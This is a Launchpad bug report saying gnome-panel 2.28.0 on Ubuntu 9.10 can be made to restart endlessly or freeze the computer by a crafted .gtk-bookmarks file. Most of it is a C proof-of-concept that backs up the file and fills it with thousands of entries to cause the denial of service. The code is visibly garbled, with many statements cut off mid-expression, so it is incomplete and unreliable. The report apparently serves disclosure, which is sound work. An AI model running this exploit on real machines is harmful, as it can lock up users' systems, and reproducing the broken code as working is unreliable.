© 2004
Canonical Ltd.
•
Terms of use
•
Data privacy
•
Contact Launchpad Support
•
Blog
•
Careers
•
System status
•
bbfa235
(Get the code!)
Binary package hint: gnome-panel
Gnome-panel 2.28.0 restarts or completely blocks the computer (need to turn off by leaving battery). I'm using ubuntu 9.10.
This happens because gnome-panel doesn't properly check the file .gtk-bookmarks that if specially crafted produces this dos.
I've made a proof of concept so you can quickly test this bug. I don't know if this can produce code execution because i don't have time to debug but surely produces this denial of service. Here is the code:
/******
* Gnome panel <= 2.28.0 denial of service poc *
* by Pietro Oliva *
* *
* After executing this poc a backup file will be created *
* You can restore it by typing ./paneldos restore *
* Using option restart gnome-panel will restart continuously *
* Using option totalblock you will need to remove the battery *
* After execution click application in the panel, then go to places*
* and wait some seconds... *
*******
#include <stdio.h>
#include <string.h>
int main(int argc, char **argv)
{
FILE *f;
unsigned long i;
printf("%s","Gnome panel <= 2.28.0 denial of service by Pietro Oliva\n\n");
if(!(f=
{
printf("%s","file not found! make sure you are running\nthis file from your home directory\n");
return 1;
}
fclose(f);
if((argv[
{
printf(
printf(
return 1;
}
if(((strcmp(
i=9999;
else if((strcmp(
i=99999;
else if((strcmp(
{
if(!(
{
printf("%s","no backup found!\nmake sure you are running\nthis file from your home directory\n");
return 1;
}
fclose(f);
system("cp .backup .gtk-bookmarks");
printf(
return 0;
}
else
{
printf(
return 1;
}
if(!(f=
{
printf(
system("cp .gtk-bookmarks .backup");
}
else
fclose(f);
f=fopen(
printf(
fwrite(
while(i>0)
{
fwrite(
i--;
}
fclose(f);
printf("%s","done! now click applications in panel,\nslide to places, wait and see the result! :D\n");
return 0;
}